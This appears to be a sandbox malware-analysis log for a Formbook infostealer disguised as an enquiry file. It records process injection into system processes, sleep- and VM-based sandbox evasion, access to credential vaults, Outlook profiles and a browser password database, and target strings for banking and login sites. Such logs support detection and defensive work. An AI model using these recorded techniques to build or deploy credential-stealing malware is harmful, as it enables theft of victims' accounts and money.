Source: 00000004.00000002.2599631540.00000000031B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1813082364.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/3@6/4
Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | Code function: 0_2_00CAD712 GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | Code function: 0_2_00C9B8B0 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | Code function: 0_2_00C9BEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | Code function: 0_2_00CAEA85 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | Code function: 0_2_00CA6F5B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle
Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | Code function: 0_2_00CBC604 CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket
Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | Code function: 0_2_00C631F2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | File created: C:\Users\user\AppData\Local\Temp\autEA31.tmp
Source: 3T-ENQ-O-2024-10856.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: netbtugc.exe, 00000005.00000003.2052849183.0000000003170000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2597976548.0000000003193000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2049766433.0000000003164000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2597976548.0000000003164000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 3T-ENQ-O-2024-10856.exe | ReversingLabs: Detection: 34%
Source: unknown | Process created: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe "C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe"
Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe"
Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe | Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
Source: C:\Windows\SysWOW64\netbtugc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe | Section loaded: wininet.dll
Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe | Section loaded: mswsock.dll
Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe | Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe | Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe | Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Windows\SysWOW64\netbtugc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: 3T-ENQ-O-2024-10856.exe | Static file information: File size 1209344 > 1048576
Source: 3T-ENQ-O-2024-10856.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 3T-ENQ-O-2024-10856.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 3T-ENQ-O-2024-10856.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 3T-ENQ-O-2024-10856.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 3T-ENQ-O-2024-10856.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 3T-ENQ-O-2024-10856.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 3T-ENQ-O-2024-10856.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: CgEnKbPFVbMNeA.exe, 00000004.00000002.2598819494.0000000000BAE000.00000002.00000001.01000000.00000005.sdmp, CgEnKbPFVbMNeA.exe, 00000008.00000002.2598388539.0000000000BAE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: 3T-ENQ-O-2024-10856.exe, 00000000.00000003.1365624481.0000000004020000.00000004.00001000.00020000.00000000.sdmp, 3T-ENQ-O-2024-10856.exe, 00000000.00000003.1363613646.0000000004170000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1717999457.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1812719227.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1812719227.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1715868537.0000000003700000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.1814673668.00000000036CA000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.1812307796.000000000351B000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2599747762.0000000003870000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2599747762.0000000003A0E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: 3T-ENQ-O-2024-10856.exe, 00000000.00000003.1365624481.0000000004020000.00000004.00001000.00020000.00000000.sdmp, 3T-ENQ-O-2024-10856.exe, 00000000.00000003.1363613646.0000000004170000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1717999457.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1812719227.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1812719227.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1715868537.0000000003700000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000005.00000003.1814673668.00000000036CA000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.1812307796.000000000351B000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2599747762.0000000003870000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2599747762.0000000003A0E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000002.1812499101.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1779767157.0000000003414000.00000004.00000020.00020000.00000000.sdmp, CgEnKbPFVbMNeA.exe, 00000004.00000003.1750564204.00000000009FB000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000002.1812499101.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1779767157.0000000003414000.00000004.00000020.00020000.00000000.sdmp, CgEnKbPFVbMNeA.exe, 00000004.00000003.1750564204.00000000009FB000.00000004.00000001.00020000.00000000.sdmp
Source: 3T-ENQ-O-2024-10856.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 3T-ENQ-O-2024-10856.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 3T-ENQ-O-2024-10856.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 3T-ENQ-O-2024-10856.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 3T-ENQ-O-2024-10856.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | Code function: 0_2_00CC20F6 LoadLibraryA,GetProcAddress
Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | Code function: 0_2_00C87795 push ecx; ret 0_2_00C877A8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040A883 push FFFFFFC7h; retf 2_2_0040AA9A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040AEA4 push cs; retf 2_2_0040AEAC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004036B0 push eax; ret 2_2_004036B2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004087F2 push ecx; iretd 2_2_004087FB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B0225F pushad ; ret 2_2_03B027F9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B027FA pushad ; ret 2_2_03B027F9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B309AD push ecx; mov dword ptr [esp], ecx 2_2_03B309B6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B0283D push eax; iretd 2_2_03B02858
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0387225F pushad ; ret 5_2_038727F9
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_038727FA pushad ; ret 5_2_038727F9
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_038A09AD push ecx; mov dword ptr [esp], ecx 5_2_038A09B6
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0387283D push eax; iretd 5_2_03872858
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03871368 push eax; iretd 5_2_03871369
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0302017D push ebp; ret 5_2_030201F3
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03020AAF push es; iretd 5_2_03020AB0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03020ACF push ds; iretd 5_2_03020AD0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0300513F push ecx; iretd 5_2_03005148
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_030071D0 push FFFFFFC7h; retf 5_2_030073E7
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_030110B0 push es; retf 6D50h 5_2_0301119D
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_030077F1 push cs; retf 5_2_030077F9
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0300DDB9 push ss; rep ret 5_2_0300DDC1
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0300DDC3 push ss; rep ret 5_2_0300DDC1
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03023C70 push edi; iretd 5_2_03023C7B
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0361638E push cx; retf 5_2_03616390
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0361D23A pushad ; ret 5_2_0361D23C
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_036150E3 push 86FB9775h; ret 5_2_036150EA
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_036170C9 push es; retf 5_2_036170D5
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0361EFC8 push ebx; iretd 5_2_0361F03E
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03615D22 pushad ; iretd 5_2_03615D23
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03615D94 push es; iretd 5_2_03615DA6
Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | Code function: 0_2_00C7F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | Code function: 0_2_00CC7F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | Code function: 0_2_00C81E5A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netbtugc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netbtugc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netbtugc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netbtugc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netbtugc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | API/Special instruction interceptor: Address: 3393224
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFEFE52D324
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFEFE52D7E4
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFEFE52D944
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFEFE52D504
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFEFE52D544
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFEFE52D1E4
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFEFE530154
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFEFE52DA44
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B7096E rdtsc 2_2_03B7096E
            Source: C:\Windows\SysWOW64\netbtugc.exe | Window / User API: threadDelayed 9841
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | Evaded block: after key decision graph_0-109835
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | Evaded block: after key decision graph_0-109052
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-109322
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | API coverage: 4.5 %
            Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exe | API coverage: 2.6 %
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7648 | Thread sleep count: 133 > 30
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7648 | Thread sleep time: -266000s >= -30000s
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7648 | Thread sleep count: 9841 > 30
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7648 | Thread sleep time: -19682000s >= -30000s
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe TID: 7760 | Thread sleep time: -35000s >= -30000s
            Source: C:\Windows\SysWOW64\netbtugc.exe | Last function: Thread delayed
            Source: C:\Windows\SysWOW64\netbtugc.exe | Last function: Thread delayed
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | Code function: 0_2_00C7DD92 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00C7DD92
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | Code function: 0_2_00CB2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00CB2044
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | Code function: 0_2_00CB219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00CB219F
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | Code function: 0_2_00CB24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00CB24A9
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | Code function: 0_2_00CA6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose, 0_2_00CA6B3F
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | Code function: 0_2_00CA6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose, 0_2_00CA6E4A
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | Code function: 0_2_00CAF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00CAF350
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | Code function: 0_2_00CAFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_00CAFDD2
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | Code function: 0_2_00CAFD47 FindFirstFileW,FindClose, 0_2_00CAFD47
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0301C0D0 FindFirstFileW,FindNextFileW,FindClose, 5_2_0301C0D0
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe | Code function: 0_2_00C7E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00C7E47B
            Source: 1m0Sa73J8.5.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696503903~
            Source: 1m0Sa73J8.5.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696503903
            Source: 1m0Sa73J8.5.dr | Binary or memory string: tasks.office.comVMware20,11696503903o
            Source: 1m0Sa73J8.5.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696503903z
            Source: 1m0Sa73J8.5.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696503903^
            Source: 1m0Sa73J8.5.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696503903}
            Source: 1m0Sa73J8.5.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696503903x
            Source: 1m0Sa73J8.5.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696503903h
            Source: 1m0Sa73J8.5.dr | Binary or memory string: bankofamerica.comVMware20,11696503903x
            Source: 1m0Sa73J8.5.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696503903]
            Source: 1m0Sa73J8.5.dr | Binary or memory string: global block list test formVMware20,11696503903
            Source: 1m0Sa73J8.5.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696503903|UE
            Source: 1m0Sa73J8.5.dr | Binary or memory string: ms.portal.azure.comVMware20,11696503903
            Source: 1m0Sa73J8.5.dr | Binary or memory string: interactivebrokers.comVMware20,11696503903
            Source: 1m0Sa73J8.5.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696503903u
            Source: 1m0Sa73J8.5.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696503903
            Source: 1m0Sa73J8.5.dr | Binary or memory string: AMC password management pageVMware20,11696503903
            Source: 1m0Sa73J8.5.dr | Binary or memory string: turbotax.intuit.comVMware20,11696503903t
            Source: netbtugc.exe, 00000005.00000002.2597976548.00000000030EE000.00000004.00000020.00020000.00000000.sdmp, CgEnKbPFVbMNeA.exe, 00000008.00000002.2599718239.0000000001160000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 1m0Sa73J8.5.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696503903}
            Source: 1m0Sa73J8.5.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696503903x
            Source: 1m0Sa73J8.5.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696503903
            Source: 3T-ENQ-O-2024-10856.exe, 00000000.00000002.1366296810.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
            Source: 1m0Sa73J8.5.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696503903
            Source: 1m0Sa73J8.5.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696503903p
            Source: 1m0Sa73J8.5.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696503903n
            Source: 1m0Sa73J8.5.dr | Binary or memory string: outlook.office365.comVMware20,11696503903t
            Source: 1m0Sa73J8.5.dr | Binary or memory string: outlook.office.comVMware20,11696503903s
            Source: 1m0Sa73J8.5.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696503903
            Source: 1m0Sa73J8.5.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696503903d
            Source: 1m0Sa73J8.5.dr | Binary or memory string: dev.azure.comVMware20,11696503903j
            Source: 1m0Sa73J8.5.dr | Binary or memory string: discord.comVMware20,11696503903f
            Source: 1m0Sa73J8.5.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696503903
